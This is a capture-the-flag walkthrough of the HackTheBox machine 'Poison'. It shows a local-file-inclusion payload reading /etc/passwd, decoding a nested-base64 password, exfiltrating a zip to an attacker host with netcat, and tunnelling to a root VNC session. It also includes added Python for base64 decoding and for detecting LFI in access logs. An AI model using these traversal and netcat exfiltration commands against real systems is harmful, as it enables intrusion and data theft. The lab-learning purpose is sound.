# HackTheBox - Poison Writeup

###### tags: `writeup` `HackTheBox` `Poison` `medium` `OSCP`

![](https://i.imgur.com/svNF8Gd.png)

## :computer: Port Scanning

```bash
# Nmap 7.92 scan initiated Fri Jun 10 07:21:26 2022 as: nmap -sV -T4 -sS -v -sC -p- -Pn -oN ports3 10.10.10.84
Nmap scan report for 10.10.10.84
Host is up (0.042s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2 (FreeBSD 20161230; protocol 2.0)
| ssh-hostkey:
|   2048 e3:3b:7d:3c:8f:4b:8c:f9:cd:7f:d2:3a:ce:2d:ff:bb (RSA)
|   256 4c:e8:c6:02:bd:fc:83:ff:c9:80:01:54:7d:22:81:72 (ECDSA)
|_  256 0b:8f:d5:71:85:90:13:85:61:8b:eb:34:13:5f:94:3b (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((FreeBSD) PHP/5.6.32)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.29 (FreeBSD) PHP/5.6.32
Service Info: OS: FreeBSD; CPE: cpe:/o:freebsd:freebsd

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Jun 10 07:28:31 2022 -- 1 IP address (1 host up) scanned in 424.26 seconds
```

## :eye: Enumeration

When we open the web page we see a form that lets us type the name of a file to load:

![](https://i.imgur.com/OewVz3B.png)

After checking each file listed in `listfiles.php` we see there is a txt file, so let's look into it.

![](https://i.imgur.com/9Vo72qN.png)

Looking at the URL we can easily recognise an LFI vulnerability, so let's try to load the **pwdbackup.txt** file using this URL:

```bash
http://10.10.10.84/browse.php?file=pwdbackup.txt
```

![](https://i.imgur.com/9EqLa07.png)

Reading it we see that it's encoded, and encoded means we can decode it easily. I'm going to use [CyberChef](https://gchq.github.io/CyberChef/); it looks like base64 encoding, so let's decode it 13 times.
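Peeling 13 layers by hand in CyberChef works, but the same job is easy to automate. The following is an added example, not part of the original writeup: it strips whitespace, keeps decoding while the data is still well-formed base64, and stops at the first layer that is not, so it never decodes the real plaintext one time too many. The sample blob is constructed here by wrapping the password in 13 rounds of base64; it is not the box's real pwdbackup.txt.

```python
import base64
import binascii
import re

# Strict base64 alphabet with optional '=' padding. Whitespace (the line
# breaks of a wrapped text dump) is stripped before the check.
_B64_RE = re.compile(rb"^[A-Za-z0-9+/]+={0,2}$")


def looks_like_base64(data: bytes) -> bool:
    """True if data, minus whitespace, is well-formed base64."""
    compact = b"".join(data.split())
    return len(compact) % 4 == 0 and _B64_RE.match(compact) is not None


def peel_base64(data: bytes, max_layers: int = 64) -> tuple:
    """Decode nested base64 until the result is no longer valid base64.

    Returns (final_bytes, layers_removed). The loop stops as soon as a layer
    fails to decode or decodes to nothing, so plaintext that merely resembles
    base64 is left alone rather than mangled.
    """
    current, layers = data, 0
    while layers < max_layers and looks_like_base64(current):
        try:
            decoded = base64.b64decode(b"".join(current.split()), validate=True)
        except (binascii.Error, ValueError):
            break
        if not decoded:
            break
        current, layers = decoded, layers + 1
    return current, layers


def build_sample(secret: bytes, layers: int = 13, width: int = 76) -> bytes:
    """Constructed stand-in for pwdbackup.txt: `secret` wrapped in `layers`
    rounds of base64, with the outer layer line-wrapped like a text dump."""
    blob = secret
    for _ in range(layers):
        blob = base64.b64encode(blob)
    return b"\n".join(blob[i:i + width] for i in range(0, len(blob), width))


if __name__ == "__main__":
    plaintext, depth = peel_base64(build_sample(b"Charix!2#4%6&8(0"))
    print(f"removed {depth} layers -> {plaintext.decode()}")
```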
![](https://i.imgur.com/mwtVBgK.png)

After decoding it 13 times we have the password:

> Charix!2#4%6&8(0

## :bomb: Exploitation

I suppose this may be the SSH password, but we don't know the user. Since we have an LFI vulnerability, let's read the **/etc/passwd** file to find the users. To do this we use an LFI payload that walks back up the directories and into `/etc/passwd`:

```bash
http://10.10.10.84/browse.php?file=../../../../../../etc/passwd
```

![](https://i.imgur.com/Zm2XbRZ.png)

Knowing a little bit of Linux, we know that every user with an id below 1000 is a service user, so now we know the user for SSH. Let's try to connect as **charix** using the decoded password.

![](https://i.imgur.com/ZQ9bMOf.png)

After that we have the user flag:

![](https://i.imgur.com/9kjy8EV.png)

It's time to privesc!

---

### Root Privesc

The first thing we do is try to unzip the secret zip.

![](https://i.imgur.com/3WtJAG1.png)

We can't unzip it on the target machine, so let's download it to our machine. For this we'll use netcat, which is installed on the target. We start a netcat listener on our machine and a netcat connection on the target machine to transfer the file.

First run this command on our machine:

```bash
nc -nvlp 9999 > secret.zip
```

Then run this on the target machine:

```bash
nc -nv 10.10.10.10 9999 < secret.zip
```

After that we receive the secret.zip file on our machine!

![](https://i.imgur.com/GGImnKU.png)

Let's try to unzip it using the same password as the SSH connection:

> Charix!2#4%6&8(0

![](https://i.imgur.com/Wzq0gxl.png)

After unzipping, the secret file contains some strange characters and is a Non-ISO file type:

![](https://i.imgur.com/HNm8DbI.png)

After that it's time to look into the machine again and enumerate more to see what we can do.
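The two browse.php requests used above (the `pwdbackup.txt` read in Enumeration and the `/etc/passwd` traversal in Exploitation) are exactly what a defender should be flagging in the Apache access log. The following is an added example, not from the original writeup: a small scanner over constructed combined-log lines modelled on those requests (addresses, timestamps and sizes are made up). It parses each query string, undoes a second layer of URL encoding, and flags traversal components, null bytes and absolute system paths in any parameter.

```python
import re
from typing import List, Optional, Tuple
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed log lines modelled on the browse.php requests in this writeup.
SAMPLE_LOG = """\
10.10.14.5 - - [10/Jun/2022:07:30:01 +0000] "GET /browse.php?file=pwdbackup.txt HTTP/1.1" 200 531 "-" "Mozilla/5.0"
10.10.14.5 - - [10/Jun/2022:07:31:12 +0000] "GET /browse.php?file=../../../../../../etc/passwd HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
10.10.14.5 - - [10/Jun/2022:07:31:40 +0000] "GET /browse.php?file=..%252F..%252Fetc%252Fpasswd HTTP/1.1" 200 2048 "-" "curl/7.81.0"
10.10.14.9 - - [10/Jun/2022:07:32:05 +0000] "GET /browse.php?file=listfiles.php HTTP/1.1" 200 900 "-" "Mozilla/5.0"
10.10.14.9 - - [10/Jun/2022:07:32:09 +0000] "GET /index.php HTTP/1.1" 200 300 "-" "Mozilla/5.0"
"""

# Combined log prefix: client identd user [timestamp] "METHOD target PROTO" status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)
TRAVERSAL_RE = re.compile(r"(^|[\\/])\.\.([\\/]|$)")  # ".." as a whole path component
SENSITIVE_PREFIXES = ("/etc/", "/proc/", "/var/", "/root/", "/home/")


def classify_request(target: str) -> Optional[str]:
    """Return why `target` looks like an LFI attempt, or None if it looks benign."""
    params = parse_qs(urlsplit(target).query, keep_blank_values=True)
    for name, values in params.items():
        for value in values:
            decoded = unquote(value)  # parse_qs decoded once; this catches double encoding
            if "\x00" in decoded:
                return f"null byte in parameter {name}"
            if TRAVERSAL_RE.search(decoded):
                return f"path traversal in parameter {name}"
            if decoded.startswith(SENSITIVE_PREFIXES):
                return f"absolute system path in parameter {name}"
    return None


def scan_access_log(text: str) -> List[Tuple[str, str, str, str]]:
    """Return (client_ip, status, reason, target) for every flagged request."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m and (reason := classify_request(m["target"])):
            hits.append((m["ip"], m["status"], reason, m["target"]))
    return hits


if __name__ == "__main__":
    for ip, status, reason, target in scan_access_log(SAMPLE_LOG):
        print(f"{ip} {status} {reason}: {target}")
```

A 200 status on a flagged request, as in both sample hits, is the strongest signal: the traversal was not just attempted but served.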
Looking at common things and using scripts like linpeas and other privesc scripts, I remembered to check the running processes, so it's time to run:

```bash
ps aux
```

After running this I found something interesting.

![](https://i.imgur.com/djU1gmd.png)

There is a vncserver running on the machine as root, but we can't reach it from outside because it didn't show up in the port scan, so we need an SSH tunnel to reach the VNC service. For more info about VNC let's look at the [Hacktricks](https://book.hacktricks.xyz/network-services-pentesting/pentesting-vnc) page; there I found that we can decrypt the secret file with a tool called [vncpwd](https://github.com/jeroennijhof/vncpwd). After downloading and compiling it we obtain the plain-text password for the VNC.

![](https://i.imgur.com/sFdSCG5.png)

With this, and knowing that the VNC port is 5901, it's time to start the SSH tunnel and try to connect.

![](https://i.imgur.com/IginSVc.png)

```bash
ssh charix@10.10.10.84 -L 1337:localhost:5901 -fN
```

With this command we start the SSH tunnel (a local port forward from our port 1337 to port 5901 on the target), and with `-fN` we tell ssh that we only want the forwarded connection and won't need an SSH shell.

Now it's time to connect to the VNC using the secret file, because in this case the decrypted password doesn't work well, so we use the secret file directly:

```bash
sudo vncviewer -passwd secret localhost:1337
```

![](https://i.imgur.com/vTbz7Yb.png)

After that a VNC window pops up logged in as root, so we can read the root flag.

![](https://i.imgur.com/5Zte0Gy.png)

To make it easier to work with, I changed the root password to root:root and logged in with SSH, because my VNC doesn't work very well.

![](https://i.imgur.com/SiIkMKm.png)

And that's all, we pwned the machine! To better understand the pivoting part and the SSH connections I really recommend the [Wreath](https://tryhackme.com/room/wreath) lab from TryHackMe, which explains very well how it all works.
---

### You can find me on:

:bird: [**Twitter**](https://twitter.com/Aka_Mecanico) :desktop_computer: [**Github**](https://github.com/Mec4nico) :ballot_box_with_check: [**TryHackMe**](https://tryhackme.com/p/mech4nico) :green_book: [**HackTheBox**](https://www.hackthebox.eu/home/users/profile/336092)